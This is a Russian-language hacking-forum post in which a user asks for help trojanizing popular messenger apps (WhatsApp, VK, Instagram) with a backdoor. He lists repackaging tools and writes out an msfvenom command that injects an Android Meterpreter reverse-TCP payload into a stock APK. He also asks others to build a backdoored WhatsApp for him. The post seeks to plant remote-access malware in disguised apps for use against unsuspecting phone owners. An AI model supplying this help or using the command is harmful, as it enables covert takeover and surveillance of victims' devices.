• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Help me!!! помогите с apk добавить backdoor

invetrika

Green Team
29.06.2018
49
18
BIT
4
Всем доброго времени суток, возникла у меня некая потребность сделать apk с backdoor (в обяз vk или аналоги, insta или аналоги, wa или аналоги) и столкнулся с проблемой создания, какие тоошибки при сборке и т.д., ну далее по порядку распишу последовательность своих действий.
Что имеется под рукой:
  • Два ноутбука, оба с установленной на борту Kali, только на одном x64 на втором i386, на первом второй системой стоит винда семёрка, два сервера ubuntu 16.04, со всеми воможными доступами, на одном накатан vnc сервер что бы можно было не только консольные приложения заводить.
Что было сделано:
  • Скачал я значит массу приложений с сайта 4пда, всякие браузеры и месседжеры, и ни в один ни с одного устройства описанных выше ничего не получилось сделать. Значит я прогнал каждое приложение через backdoor-apk, thefatrat, apkinjection, spade, evil-droid, msfvenom ( непосредственно через команду msfvenom -x стоковое.apk -p android/meterpreter/reverse_tcp LPORT= LHOST= -o ломаное.apk). Фишка в том что просто через msfvenom простое пустое приложение MainActivity.apk получается без проблем! и сессия прилетает, а вот именно с тем что бы провернуть что то с другим приложением я получаю ошибки при сборке, apktool переставлял миллион раз, java так же.
Что нужно сделать:
  • Объяснить мне глупому мальчонке что делать и как быть. Либо соберите пожалуйста через apktool мне whatsapp с бэкдором или vk, и скиньте пожалуйста мне, я его разберу, поменяю payload на свой и соберу обратно. Я просто уже реально не знаю что делать та)
Заранее ОГРОМНОЕ СПАСИБО ВАМ ЛЮДИ ДОБРЫЕ
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!